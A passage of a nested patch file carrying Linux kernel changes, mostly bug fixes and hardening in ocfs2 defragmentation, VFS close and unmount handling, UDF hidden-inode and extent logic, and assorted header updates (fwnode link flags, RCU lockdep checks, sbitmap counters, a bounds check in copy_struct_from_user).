+ 	replace_rec.e_flags = ext_flags & ~OCFS2_EXT_REFCOUNTED;
+ 
+-	ret = ocfs2_journal_access_di(handle, INODE_CACHE(inode),
+-				      context->et.et_root_bh,
+-				      OCFS2_JOURNAL_ACCESS_WRITE);
+-	if (ret) {
+-		mlog_errno(ret);
+-		goto out;
+-	}
+-
+ 	ret = ocfs2_split_extent(handle, &context->et, path, index,
+ 				 &replace_rec, context->meta_ac,
+ 				 &context->dealloc);
+@@ -121,8 +113,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 		goto out;
+ 	}
+ 
+-	ocfs2_journal_dirty(handle, context->et.et_root_bh);
+-
+ 	context->new_phys_cpos = new_p_cpos;
+ 
+ 	/*
+@@ -444,7 +434,7 @@ static int ocfs2_find_victim_alloc_group(struct inode *inode,
+ 			bg = (struct ocfs2_group_desc *)gd_bh->b_data;
+ 
+ 			if (vict_blkno < (le64_to_cpu(bg->bg_blkno) +
+-						le16_to_cpu(bg->bg_bits))) {
++						(le16_to_cpu(bg->bg_bits) << bits_per_unit))) {
+ 
+ 				*ret_bh = gd_bh;
+ 				*vict_bit = (vict_blkno - blkno) >>
+@@ -559,6 +549,7 @@ static void ocfs2_probe_alloc_group(struct inode *inode, struct buffer_head *bh,
+ 			last_free_bits++;
+ 
+ 		if (last_free_bits == move_len) {
++			i -= move_len;
+ 			*goal_bit = i;
+ 			*phys_cpos = base_cpos + i;
+ 			break;
+@@ -1030,18 +1021,19 @@ int ocfs2_ioctl_move_extents(struct file *filp, void __user *argp)
+ 
+ 	context->range = &range;
+ 
++	/*
++	 * ok, the default theshold for the defragmentation
++	 * is 1M, since our maximum clustersize was 1M also.
++	 * any thought?
++	 */
++	if (!range.me_threshold)
++		range.me_threshold = 1024 * 1024;
++
++	if (range.me_threshold > i_size_read(inode))
++		range.me_threshold = i_size_read(inode);
++
+ 	if (range.me_flags & OCFS2_MOVE_EXT_FL_AUTO_DEFRAG) {
+ 		context->auto_defrag = 1;
+-		/*
+-		 * ok, the default theshold for the defragmentation
+-		 * is 1M, since our maximum clustersize was 1M also.
+-		 * any thought?
+-		 */
+-		if (!range.me_threshold)
+-			range.me_threshold = 1024 * 1024;
+-
+-		if (range.me_threshold > i_size_read(inode))
+-			range.me_threshold = i_size_read(inode);
+ 
+ 		if (range.me_flags & OCFS2_MOVE_EXT_FL_PART_DEFRAG)
+ 			context->partial = 1;
+diff --git a/fs/open.c b/fs/open.c
+index 9d0197db15e7b..20717ec510c07 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1411,8 +1411,9 @@ int filp_close(struct file *filp, fl_owner_t id)
+ {
+ 	int retval = 0;
+ 
+-	if (!file_count(filp)) {
+-		printk(KERN_ERR "VFS: Close: file count is 0\n");
++	if (CHECK_DATA_CORRUPTION(file_count(filp) == 0,
++			"VFS: Close: file count is 0 (f_op=%ps)",
++			filp->f_op)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/fs/super.c b/fs/super.c
+index 8d39e4f11cfa3..4f8a626a35cd9 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -491,10 +491,23 @@ void generic_shutdown_super(struct super_block *sb)
+ 		if (sop->put_super)
+ 			sop->put_super(sb);
+ 
+-		if (!list_empty(&sb->s_inodes)) {
+-			printk("VFS: Busy inodes after unmount of %s. "
+-			   "Self-destruct in 5 seconds.  Have a nice day...\n",
+-			   sb->s_id);
++		if (CHECK_DATA_CORRUPTION(!list_empty(&sb->s_inodes),
++				"VFS: Busy inodes after unmount of %s (%s)",
++				sb->s_id, sb->s_type->name)) {
++			/*
++			 * Adding a proper bailout path here would be hard, but
++			 * we can at least make it more likely that a later
++			 * iput_final() or such crashes cleanly.
++			 */
++			struct inode *inode;
++
++			spin_lock(&sb->s_inode_list_lock);
++			list_for_each_entry(inode, &sb->s_inodes, i_sb_list) {
++				inode->i_op = VFS_PTR_POISON;
++				inode->i_sb = VFS_PTR_POISON;
++				inode->i_mapping = VFS_PTR_POISON;
++			}
++			spin_unlock(&sb->s_inode_list_lock);
+ 		}
+ 	}
+ 	spin_lock(&sb_lock);
+diff --git a/fs/udf/file.c b/fs/udf/file.c
+index 5c659e23e578f..8be51161f3e52 100644
+--- a/fs/udf/file.c
++++ b/fs/udf/file.c
+@@ -149,26 +149,24 @@ static ssize_t udf_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 
+ 	down_write(&iinfo->i_data_sem);
+-	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
+-		loff_t end = iocb->ki_pos + iov_iter_count(from);
+-
+-		if (inode->i_sb->s_blocksize <
+-				(udf_file_entry_alloc_offset(inode) + end)) {
+-			err = udf_expand_file_adinicb(inode);
+-			if (err) {
+-				inode_unlock(inode);
+-				udf_debug("udf_expand_adinicb: err=%d\n", err);
+-				return err;
+-			}
+-		} else {
+-			iinfo->i_lenAlloc = max(end, inode->i_size);
+-			up_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
++	    inode->i_sb->s_blocksize < (udf_file_entry_alloc_offset(inode) +
++				 iocb->ki_pos + iov_iter_count(from))) {
++		err = udf_expand_file_adinicb(inode);
++		if (err) {
++			inode_unlock(inode);
++			udf_debug("udf_expand_adinicb: err=%d\n", err);
++			return err;
+ 		}
+ 	} else
+ 		up_write(&iinfo->i_data_sem);
+ 
+ 	retval = __generic_file_write_iter(iocb, from);
+ out:
++	down_write(&iinfo->i_data_sem);
++	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB && retval > 0)
++		iinfo->i_lenAlloc = inode->i_size;
++	up_write(&iinfo->i_data_sem);
+ 	inode_unlock(inode);
+ 
+ 	if (retval > 0) {
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index e92a16435a29e..259152a08852b 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -526,8 +526,10 @@ static int udf_do_extend_file(struct inode *inode,
+ 	}
+ 
+ 	if (fake) {
+-		udf_add_aext(inode, last_pos, &last_ext->extLocation,
+-			     last_ext->extLength, 1);
++		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
++				   last_ext->extLength, 1);
++		if (err < 0)
++			goto out_err;
+ 		count++;
+ 	} else {
+ 		struct kernel_lb_addr tmploc;
+@@ -561,7 +563,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 	if (new_block_bytes) {
+@@ -570,7 +572,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		err = udf_add_aext(inode, last_pos, &last_ext->extLocation,
+ 				   last_ext->extLength, 1);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 		count++;
+ 	}
+ 
+@@ -584,6 +586,11 @@ out:
+ 		return -EIO;
+ 
+ 	return count;
++out_err:
++	/* Remove extents we've created so far */
++	udf_clear_extent_cache(inode);
++	udf_truncate_extents(inode);
++	return err;
+ }
+ 
+ /* Extend the final block of the file to final_block_len bytes */
+@@ -798,19 +805,17 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		c = 0;
+ 		offset = 0;
+ 		count += ret;
+-		/* We are not covered by a preallocated extent? */
+-		if ((laarr[0].extLength & UDF_EXTENT_FLAG_MASK) !=
+-						EXT_NOT_RECORDED_ALLOCATED) {
+-			/* Is there any real extent? - otherwise we overwrite
+-			 * the fake one... */
+-			if (count)
+-				c = !c;
+-			laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
+-				inode->i_sb->s_blocksize;
+-			memset(&laarr[c].extLocation, 0x00,
+-				sizeof(struct kernel_lb_addr));
+-			count++;
+-		}
++		/*
++		 * Is there any real extent? - otherwise we overwrite the fake
++		 * one...
++		 */
++		if (count)
++			c = !c;
++		laarr[c].extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
++			inode->i_sb->s_blocksize;
++		memset(&laarr[c].extLocation, 0x00,
++			sizeof(struct kernel_lb_addr));
++		count++;
+ 		endnum = c + 1;
+ 		lastblock = 1;
+ 	} else {
+@@ -1087,23 +1092,8 @@ static void udf_merge_extents(struct inode *inode, struct kernel_long_ad *laarr,
+ 			blocksize - 1) >> blocksize_bits)))) {
+ 
+ 			if (((li->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				(lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
+-				blocksize - 1) & ~UDF_EXTENT_LENGTH_MASK) {
+-				lip1->extLength = (lip1->extLength -
+-						  (li->extLength &
+-						   UDF_EXTENT_LENGTH_MASK) +
+-						   UDF_EXTENT_LENGTH_MASK) &
+-							~(blocksize - 1);
+-				li->extLength = (li->extLength &
+-						 UDF_EXTENT_FLAG_MASK) +
+-						(UDF_EXTENT_LENGTH_MASK + 1) -
+-						blocksize;
+-				lip1->extLocation.logicalBlockNum =
+-					li->extLocation.logicalBlockNum +
+-					((li->extLength &
+-						UDF_EXTENT_LENGTH_MASK) >>
+-						blocksize_bits);
+-			} else {
++			     (lip1->extLength & UDF_EXTENT_LENGTH_MASK) +
++			     blocksize - 1) <= UDF_EXTENT_LENGTH_MASK) {
+ 				li->extLength = lip1->extLength +
+ 					(((li->extLength &
+ 						UDF_EXTENT_LENGTH_MASK) +
+@@ -1388,6 +1378,7 @@ reread:
+ 		ret = -EIO;
+ 		goto out;
+ 	}
++	iinfo->i_hidden = hidden_inode;
+ 	iinfo->i_unique = 0;
+ 	iinfo->i_lenEAttr = 0;
+ 	iinfo->i_lenExtents = 0;
+@@ -1723,8 +1714,12 @@ static int udf_update_inode(struct inode *inode, int do_sync)
+ 
+ 	if (S_ISDIR(inode->i_mode) && inode->i_nlink > 0)
+ 		fe->fileLinkCount = cpu_to_le16(inode->i_nlink - 1);
+-	else
+-		fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	else {
++		if (iinfo->i_hidden)
++			fe->fileLinkCount = cpu_to_le16(0);
++		else
++			fe->fileLinkCount = cpu_to_le16(inode->i_nlink);
++	}
+ 
+ 	fe->informationLength = cpu_to_le64(inode->i_size);
+ 
+@@ -1895,8 +1890,13 @@ struct inode *__udf_iget(struct super_block *sb, struct kernel_lb_addr *ino,
+ 	if (!inode)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (!(inode->i_state & I_NEW))
++	if (!(inode->i_state & I_NEW)) {
++		if (UDF_I(inode)->i_hidden != hidden_inode) {
++			iput(inode);
++			return ERR_PTR(-EFSCORRUPTED);
++		}
+ 		return inode;
++	}
+ 
+ 	memcpy(&UDF_I(inode)->i_location, ino, sizeof(struct kernel_lb_addr));
+ 	err = udf_read_inode(inode, hidden_inode);
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 4042d9739fb78..6dc9d8dad88eb 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -147,6 +147,7 @@ static struct inode *udf_alloc_inode(struct super_block *sb)
+ 	ei->i_next_alloc_goal = 0;
+ 	ei->i_strat4096 = 0;
+ 	ei->i_streamdir = 0;
++	ei->i_hidden = 0;
+ 	init_rwsem(&ei->i_data_sem);
+ 	ei->cached_extent.lstart = -1;
+ 	spin_lock_init(&ei->i_extent_cache_lock);
+diff --git a/fs/udf/udf_i.h b/fs/udf/udf_i.h
+index 06ff7006b8227..312b7c9ef10e2 100644
+--- a/fs/udf/udf_i.h
++++ b/fs/udf/udf_i.h
+@@ -44,7 +44,8 @@ struct udf_inode_info {
+ 	unsigned		i_use : 1;	/* unallocSpaceEntry */
+ 	unsigned		i_strat4096 : 1;
+ 	unsigned		i_streamdir : 1;
+-	unsigned		reserved : 25;
++	unsigned		i_hidden : 1;	/* hidden system inode */
++	unsigned		reserved : 24;
+ 	__u8			*i_data;
+ 	struct kernel_lb_addr	i_locStreamdir;
+ 	__u64			i_lenStreams;
+diff --git a/fs/udf/udf_sb.h b/fs/udf/udf_sb.h
+index 4fa620543d302..2205859731dc2 100644
+--- a/fs/udf/udf_sb.h
++++ b/fs/udf/udf_sb.h
+@@ -51,6 +51,8 @@
+ #define MF_DUPLICATE_MD		0x01
+ #define MF_MIRROR_FE_LOADED	0x02
+ 
++#define EFSCORRUPTED EUCLEAN
++
+ struct udf_meta_data {
+ 	__u32	s_meta_file_loc;
+ 	__u32	s_mirror_file_loc;
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 20b21b577deaa..9054a5185e1a9 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -296,6 +296,10 @@ int mipi_dsi_dcs_set_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 brightness);
+ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ 					u16 *brightness);
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness);
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness);
+ 
+ /**
+  * mipi_dsi_dcs_write_seq - transmit a DCS command with payload
+diff --git a/include/drm/drm_print.h b/include/drm/drm_print.h
+index a44fb7ef257f6..094ded23534c7 100644
+--- a/include/drm/drm_print.h
++++ b/include/drm/drm_print.h
+@@ -521,7 +521,7 @@ __printf(1, 2)
+ void __drm_err(const char *format, ...);
+ 
+ #if !defined(CONFIG_DRM_USE_DYNAMIC_DEBUG)
+-#define __drm_dbg(fmt, ...)		___drm_dbg(NULL, fmt, ##__VA_ARGS__)
++#define __drm_dbg(cat, fmt, ...)		___drm_dbg(NULL, cat, fmt, ##__VA_ARGS__)
+ #else
+ #define __drm_dbg(cat, fmt, ...)					\
+ 	_dynamic_func_call_cls(cat, fmt, ___drm_dbg,			\
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 891f8cbcd0436..1680b6e1e5362 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -487,6 +487,7 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
++	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index c1bd1bd105067..942f9ac9fa7b6 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -266,6 +266,13 @@ static inline bool map_value_has_kptrs(const struct bpf_map *map)
+ 	return !IS_ERR_OR_NULL(map->kptr_off_tab);
+ }
+ 
++/* 'dst' must be a temporary buffer and should not point to memory that is being
++ * used in parallel by a bpf program or bpf syscall, otherwise the access from
++ * the bpf program or bpf syscall may be corrupted by the reinitialization,
++ * leading to weird problems. Even 'dst' is newly-allocated from bpf memory
++ * allocator, it is still possible for 'dst' to be used in parallel by a bpf
++ * program or bpf syscall.
++ */
+ static inline void check_and_init_map_value(struct bpf_map *map, void *dst)
+ {
+ 	if (unlikely(map_value_has_spin_lock(map)))
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index dcef4a9e4d63e..d4afa8508a806 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -130,9 +130,36 @@ static __always_inline unsigned long ct_state_inc(int incby)
+ 	return arch_atomic_add_return(incby, this_cpu_ptr(&context_tracking.state));
+ }
+ 
++static __always_inline bool warn_rcu_enter(void)
++{
++	bool ret = false;
++
++	/*
++	 * Horrible hack to shut up recursive RCU isn't watching fail since
++	 * lots of the actual reporting also relies on RCU.
++	 */
++	preempt_disable_notrace();
++	if (rcu_dynticks_curr_cpu_in_eqs()) {
++		ret = true;
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	}
++
++	return ret;
++}
++
++static __always_inline void warn_rcu_exit(bool rcu)
++{
++	if (rcu)
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	preempt_enable_notrace();
++}
++
+ #else
+ static inline void ct_idle_enter(void) { }
+ static inline void ct_idle_exit(void) { }
++
++static __always_inline bool warn_rcu_enter(void) { return false; }
++static __always_inline void warn_rcu_exit(bool rcu) { }
+ #endif /* !CONFIG_CONTEXT_TRACKING_IDLE */
+ 
+ #endif
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 424b55df02727..7cf24330d6814 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -327,6 +327,7 @@ enum device_link_state {
+ #define DL_FLAG_MANAGED			BIT(6)
+ #define DL_FLAG_SYNC_STATE_ONLY		BIT(7)
+ #define DL_FLAG_INFERRED		BIT(8)
++#define DL_FLAG_CYCLE			BIT(9)
+ 
+ /**
+  * enum dl_dev_state - Device driver presence tracking information.
+diff --git a/include/linux/fwnode.h b/include/linux/fwnode.h
+index 89b9bdfca925c..5700451b300fb 100644
+--- a/include/linux/fwnode.h
++++ b/include/linux/fwnode.h
+@@ -18,7 +18,7 @@ struct fwnode_operations;
+ struct device;
+ 
+ /*
+- * fwnode link flags
++ * fwnode flags
+  *
+  * LINKS_ADDED:	The fwnode has already be parsed to add fwnode links.
+  * NOT_DEVICE:	The fwnode will never be populated as a struct device.
+@@ -36,6 +36,7 @@ struct device;
+ #define FWNODE_FLAG_INITIALIZED			BIT(2)
+ #define FWNODE_FLAG_NEEDS_CHILD_BOUND_ON_ADD	BIT(3)
+ #define FWNODE_FLAG_BEST_EFFORT			BIT(4)
++#define FWNODE_FLAG_VISITED			BIT(5)
+ 
+ struct fwnode_handle {
+ 	struct fwnode_handle *secondary;
+@@ -46,11 +47,19 @@ struct fwnode_handle {
+ 	u8 flags;
+ };
+ 
++/*
++ * fwnode link flags
++ *
++ * CYCLE:	The fwnode link is part of a cycle. Don't defer probe.
++ */
++#define FWLINK_FLAG_CYCLE			BIT(0)
++
+ struct fwnode_link {
+ 	struct fwnode_handle *supplier;
+ 	struct list_head s_hook;
+ 	struct fwnode_handle *consumer;
+ 	struct list_head c_hook;
++	u8 flags;
+ };
+ 
+ /**
+@@ -198,7 +207,6 @@ static inline void fwnode_dev_initialized(struct fwnode_handle *fwnode,
+ 		fwnode->flags &= ~FWNODE_FLAG_INITIALIZED;
+ }
+ 
+-extern u32 fw_devlink_get_flags(void);
+ extern bool fw_devlink_is_strict(void);
+ int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup);
+ void fwnode_links_purge(struct fwnode_handle *fwnode);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 8677ae38599e4..48563dc09e171 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -619,6 +619,7 @@ struct hid_device {							/* device report descriptor */
+ 	unsigned long status;						/* see STAT flags above */
+ 	unsigned claimed;						/* Claimed by hidinput, hiddev? */
+ 	unsigned quirks;						/* Various quirks the device can pull on us */
++	unsigned initial_quirks;					/* Initial set of quirks supplied when creating device */
+ 	bool io_started;						/* If IO has started */
+ 
+ 	struct list_head inputs;					/* The list of inputs */
+diff --git a/include/linux/ima.h b/include/linux/ima.h
+index 81708ca0ebc74..83ddee788583e 100644
+--- a/include/linux/ima.h
++++ b/include/linux/ima.h
+@@ -21,7 +21,8 @@ extern int ima_file_check(struct file *file, int mask);
+ extern void ima_post_create_tmpfile(struct user_namespace *mnt_userns,
+ 				    struct inode *inode);
+ extern void ima_file_free(struct file *file);
+-extern int ima_file_mmap(struct file *file, unsigned long prot);
++extern int ima_file_mmap(struct file *file, unsigned long reqprot,
++			 unsigned long prot, unsigned long flags);
+ extern int ima_file_mprotect(struct vm_area_struct *vma, unsigned long prot);
+ extern int ima_load_data(enum kernel_load_data_id id, bool contents);
+ extern int ima_post_load_data(char *buf, loff_t size,
+@@ -76,7 +77,8 @@ static inline void ima_file_free(struct file *file)
+ 	return;
+ }
+ 
+-static inline int ima_file_mmap(struct file *file, unsigned long prot)
++static inline int ima_file_mmap(struct file *file, unsigned long reqprot,
++				unsigned long prot, unsigned long flags)
+ {
+ 	return 0;
+ }
+diff --git a/include/linux/kernel_stat.h b/include/linux/kernel_stat.h
+index ddb5a358fd829..90e2fdc17d79f 100644
+--- a/include/linux/kernel_stat.h
++++ b/include/linux/kernel_stat.h
+@@ -75,7 +75,7 @@ extern unsigned int kstat_irqs_usr(unsigned int irq);
+ /*
+  * Number of interrupts per cpu, since bootup
+  */
+-static inline unsigned int kstat_cpu_irqs_sum(unsigned int cpu)
++static inline unsigned long kstat_cpu_irqs_sum(unsigned int cpu)
+ {
+ 	return kstat_cpu(cpu).irqs_sum;
+ }
+diff --git a/include/linux/kobject.h b/include/linux/kobject.h
+index 57fb972fea05b..592f9785b058a 100644
+--- a/include/linux/kobject.h
++++ b/include/linux/kobject.h
+@@ -115,7 +115,7 @@ extern void kobject_put(struct kobject *kobj);
+ extern const void *kobject_namespace(struct kobject *kobj);
+ extern void kobject_get_ownership(struct kobject *kobj,
+ 				  kuid_t *uid, kgid_t *gid);
+-extern char *kobject_get_path(struct kobject *kobj, gfp_t flag);
++extern char *kobject_get_path(const struct kobject *kobj, gfp_t flag);
+ 
+ struct kobj_type {
+ 	void (*release)(struct kobject *kobj);
+diff --git a/include/linux/kprobes.h b/include/linux/kprobes.h
+index a0b92be98984e..85a64cb95d755 100644
+--- a/include/linux/kprobes.h
++++ b/include/linux/kprobes.h
+@@ -378,6 +378,8 @@ extern void opt_pre_handler(struct kprobe *p, struct pt_regs *regs);
+ DEFINE_INSN_CACHE_OPS(optinsn);
+ 
+ extern void wait_for_kprobe_optimizer(void);
++bool optprobe_queued_unopt(struct optimized_kprobe *op);
++bool kprobe_disarmed(struct kprobe *p);
+ #else /* !CONFIG_OPTPROBES */
+ static inline void wait_for_kprobe_optimizer(void) { }
+ #endif /* CONFIG_OPTPROBES */
+diff --git a/include/linux/libnvdimm.h b/include/linux/libnvdimm.h
+index c74acfa1a3fe9..4e5f578025c4c 100644
+--- a/include/linux/libnvdimm.h
++++ b/include/linux/libnvdimm.h
+@@ -36,6 +36,9 @@ enum {
+ 	/* dimm supports namespace labels */
+ 	NDD_LABELING = 6,
+ 
++	/* dimm provider wants synchronous registration by __nvdimm_create() */
++	NDD_REGISTER_SYNC = 8,
++
+ 	/* need to set a limit somewhere, but yes, this is likely overkill */
+ 	ND_IOCTL_MAX_BUFLEN = SZ_4M,
+ 	ND_CMD_MAX_ELEM = 5,
+diff --git a/include/linux/mlx4/qp.h b/include/linux/mlx4/qp.h
+index 9db93e487496a..b6b626157b03a 100644
+--- a/include/linux/mlx4/qp.h
++++ b/include/linux/mlx4/qp.h
+@@ -446,6 +446,7 @@ enum {
+ 
+ struct mlx4_wqe_inline_seg {
+ 	__be32			byte_count;
++	__u8			data[];
+ };
+ 
+ enum mlx4_update_qp_attr {
+diff --git a/include/linux/nfs_ssc.h b/include/linux/nfs_ssc.h
+index 75843c00f326a..22265b1ff0800 100644
+--- a/include/linux/nfs_ssc.h
++++ b/include/linux/nfs_ssc.h
+@@ -53,6 +53,7 @@ static inline void nfs42_ssc_close(struct file *filep)
+ 	if (nfs_ssc_client_tbl.ssc_nfs4_ops)
+ 		(*nfs_ssc_client_tbl.ssc_nfs4_ops->sco_close)(filep);
+ }
++#endif
+ 
+ struct nfsd4_ssc_umount_item {
+ 	struct list_head nsui_list;
+@@ -66,7 +67,6 @@ struct nfsd4_ssc_umount_item {
+ 	struct vfsmount *nsui_vfsmount;
+ 	char nsui_ipaddr[RPC_MAX_ADDRBUFLEN + 1];
+ };
+-#endif
+ 
+ /*
+  * NFS_FS
+diff --git a/include/linux/poison.h b/include/linux/poison.h
+index 2d3249eb0e62d..0e8a1f2ceb2f1 100644
+--- a/include/linux/poison.h
++++ b/include/linux/poison.h
+@@ -84,4 +84,7 @@
+ /********** kernel/bpf/ **********/
+ #define BPF_PTR_POISON ((void *)(0xeB9FUL + POISON_POINTER_DELTA))
+ 
++/********** VFS **********/
++#define VFS_PTR_POISON ((void *)(0xF5 + POISON_POINTER_DELTA))
++
+ #endif
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 08605ce7379d7..e9e61cd27ef63 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -229,6 +229,7 @@ void synchronize_rcu_tasks_rude(void);
+ 
+ #define rcu_note_voluntary_context_switch(t) rcu_tasks_qs(t, false)
+ void exit_tasks_rcu_start(void);
++void exit_tasks_rcu_stop(void);
+ void exit_tasks_rcu_finish(void);
+ #else /* #ifdef CONFIG_TASKS_RCU_GENERIC */
+ #define rcu_tasks_classic_qs(t, preempt) do { } while (0)
+@@ -237,6 +238,7 @@ void exit_tasks_rcu_finish(void);
+ #define call_rcu_tasks call_rcu
+ #define synchronize_rcu_tasks synchronize_rcu
+ static inline void exit_tasks_rcu_start(void) { }
++static inline void exit_tasks_rcu_stop(void) { }
+ static inline void exit_tasks_rcu_finish(void) { }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU_GENERIC */
+ 
+@@ -348,11 +350,18 @@ static inline int rcu_read_lock_any_held(void)
+  * RCU_LOCKDEP_WARN - emit lockdep splat if specified condition is met
+  * @c: condition to check
+  * @s: informative message
++ *
++ * This checks debug_lockdep_rcu_enabled() before checking (c) to
++ * prevent early boot splats due to lockdep not yet being initialized,
++ * and rechecks it after checking (c) to prevent false-positive splats
++ * due to races with lockdep being disabled.  See commit 3066820034b5dd
++ * ("rcu: Reject RCU_LOCKDEP_WARN() false positives") for more detail.
+  */
+ #define RCU_LOCKDEP_WARN(c, s)						\
+ 	do {								\
+ 		static bool __section(".data.unlikely") __warned;	\
+-		if ((c) && debug_lockdep_rcu_enabled() && !__warned) {	\
++		if (debug_lockdep_rcu_enabled() && (c) &&		\
++		    debug_lockdep_rcu_enabled() && !__warned) {		\
+ 			__warned = true;				\
+ 			lockdep_rcu_suspicious(__FILE__, __LINE__, s);	\
+ 		}							\
+diff --git a/include/linux/rmap.h b/include/linux/rmap.h
+index bd3504d11b155..2bdba700bc3e3 100644
+--- a/include/linux/rmap.h
++++ b/include/linux/rmap.h
+@@ -94,7 +94,7 @@ enum ttu_flags {
+ 	TTU_SPLIT_HUGE_PMD	= 0x4,	/* split huge PMD if any */
+ 	TTU_IGNORE_MLOCK	= 0x8,	/* ignore mlock */
+ 	TTU_SYNC		= 0x10,	/* avoid racy checks with PVMW_SYNC */
+-	TTU_IGNORE_HWPOISON	= 0x20,	/* corrupted page is recoverable */
++	TTU_HWPOISON		= 0x20,	/* do convert pte to hwpoison entry */
+ 	TTU_BATCH_FLUSH		= 0x40,	/* Batch TLB flushes where possible
+ 					 * and caller guarantees they will
+ 					 * do a final flush if necessary */
+diff --git a/include/linux/sbitmap.h b/include/linux/sbitmap.h
+index 4d2d5205ab586..d662cf136021d 100644
+--- a/include/linux/sbitmap.h
++++ b/include/linux/sbitmap.h
+@@ -86,11 +86,6 @@ struct sbitmap {
+  * struct sbq_wait_state - Wait queue in a &struct sbitmap_queue.
+  */
+ struct sbq_wait_state {
+-	/**
+-	 * @wait_cnt: Number of frees remaining before we wake up.
+-	 */
+-	atomic_t wait_cnt;
+-
+ 	/**
+ 	 * @wait: Wait queue.
+ 	 */
+@@ -138,6 +133,17 @@ struct sbitmap_queue {
+ 	 * sbitmap_queue_get_shallow()
+ 	 */
+ 	unsigned int min_shallow_depth;
++
++	/**
++	 * @completion_cnt: Number of bits cleared passed to the
++	 * wakeup function.
++	 */
++	atomic_t completion_cnt;
++
++	/**
++	 * @wakeup_cnt: Number of thread wake ups issued.
++	 */
++	atomic_t wakeup_cnt;
+ };
+ 
+ /**
+diff --git a/include/linux/transport_class.h b/include/linux/transport_class.h
+index 63076fb835e34..2efc271a96fa6 100644
+--- a/include/linux/transport_class.h
++++ b/include/linux/transport_class.h
+@@ -70,8 +70,14 @@ void transport_destroy_device(struct device *);
+ static inline int
+ transport_register_device(struct device *dev)
+ {
++	int ret;
++
+ 	transport_setup_device(dev);
+-	return transport_add_device(dev);
++	ret = transport_add_device(dev);
++	if (ret)
++		transport_destroy_device(dev);
++
++	return ret;
+ }
+ 
+ static inline void
+diff --git a/include/linux/uaccess.h b/include/linux/uaccess.h
+index afb18f198843b..ab9728138ad67 100644
+--- a/include/linux/uaccess.h
++++ b/include/linux/uaccess.h
+@@ -329,6 +329,10 @@ copy_struct_from_user(void *dst, size_t ksize, const void __user *src,
+ 	size_t size = min(ksize, usize);
+ 	size_t rest = max(ksize, usize) - size;
+ 
++	/* Double check if ksize is larger than a known object size. */
++	if (WARN_ON_ONCE(ksize > __builtin_object_size(dst, 1)))
++		return -E2BIG;
++
+ 	/* Deal with trailing bytes. */
+ 	if (usize < ksize) {
+ 		memset(dst + size, 0, rest);
+diff --git a/include/linux/wait.h b/include/linux/wait.h
+index 7f5a51aae0a73..a0307b516b099 100644
+--- a/include/linux/wait.h
++++ b/include/linux/wait.h
+@@ -209,7 +209,7 @@ __remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq
+ 	list_del(&wq_entry->entry);
+ }
+ 
+-void __wake_up(struct wait_queue_head *wq_head, unsigned int mode, int nr, void *key);
++int __wake_up(struct wait_queue_head *wq_head, unsigned int mode, int nr, void *key);
+ void __wake_up_locked_key(struct wait_queue_head *wq_head, unsigned int mode, void *key);
+ void __wake_up_locked_key_bookmark(struct wait_queue_head *wq_head,
+ 		unsigned int mode, void *key, wait_queue_entry_t *bookmark);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 1f868764575c3..832a4a51de4d9 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1952,7 +1952,12 @@ void sk_common_release(struct sock *sk);
+  *	Default socket callbacks and setup code
+  */
+ 
